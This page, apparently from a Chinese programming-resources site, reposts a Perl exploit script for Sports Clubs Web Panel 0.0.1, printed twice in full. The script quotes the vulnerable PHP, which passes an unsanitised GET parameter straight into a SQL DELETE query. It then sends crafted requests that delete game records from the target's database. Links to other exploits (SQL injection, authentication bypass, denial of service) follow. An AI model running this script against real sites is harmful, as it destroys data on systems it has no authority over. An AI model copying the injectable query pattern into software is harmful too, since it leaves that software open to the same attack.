您现在的位置是:网站首页> 编程资料编程资料
Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit _Exploit_网络安全_
2023-05-24
328人已围观
简介 Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit _Exploit_网络安全_
#!/usr/bin/perl -W # Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
# File affected: include/draw-delete.php (id) # Vuln Code: # 06: $did = $_GET['id'];
# 08: mysql_query("DELETE FROM draw WHERE did='$did'"); # by ka0x
# D.O.M Labs - Security Researchers
# - www.domlabs.org -
# # ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3
use LWP::UserAgent; my $host = $ARGV[0];
my $did = $ARGV[1]; die &_USAGE unless $ARGV[1]; sub _USAGE
{
die "
- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -
- by ka0x (www.domlabs.org) usage: ./$0
ex: ./$0 http://localhost/sportspanel 2
";
} my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);
my $res = $ua->request($req);
my $con = $res->content; if ($res->is_success){
if($con =~ /$did/){
print "[ ] The Game \"$did\" has been deleted from the database!\n";
}
} else{
print "[-] Exploit Failed!";
} __END__
# File affected: include/draw-delete.php (id) # Vuln Code: # 06: $did = $_GET['id'];
# 08: mysql_query("DELETE FROM draw WHERE did='$did'"); # by ka0x
# D.O.M Labs - Security Researchers
# - www.domlabs.org -
# # ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3
use LWP::UserAgent; my $host = $ARGV[0];
my $did = $ARGV[1]; die &_USAGE unless $ARGV[1]; sub _USAGE
{
die "
- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -
- by ka0x (www.domlabs.org) usage: ./$0
ex: ./$0 http://localhost/sportspanel 2
";
} my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);
my $res = $ua->request($req);
my $con = $res->content; if ($res->is_success){
if($con =~ /$did/){
print "[ ] The Game \"$did\" has been deleted from the database!\n";
}
} else{
print "[-] Exploit Failed!";
} __END__
相关内容
- pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit _Exploit_网络安全_
- Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit _Exploit_网络安全_
- The Personal FTP Server 6.0f RETR Denial of Service Exploit _Exploit_网络安全_
- Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053) _Exploit_网络安全_
- DESlock _Exploit_网络安全_
- Debian Sarge Multiple IMAP Server Denial of Service Exploit _Exploit_网络安全_
- DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit _Exploit_网络安全_
- Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack) _Exploit_网络安全_
- CJ Ultra Plus _Exploit_网络安全_
- Rianxosencabos CMS 0.9 Remote Add Admin Exploit _Exploit_网络安全_
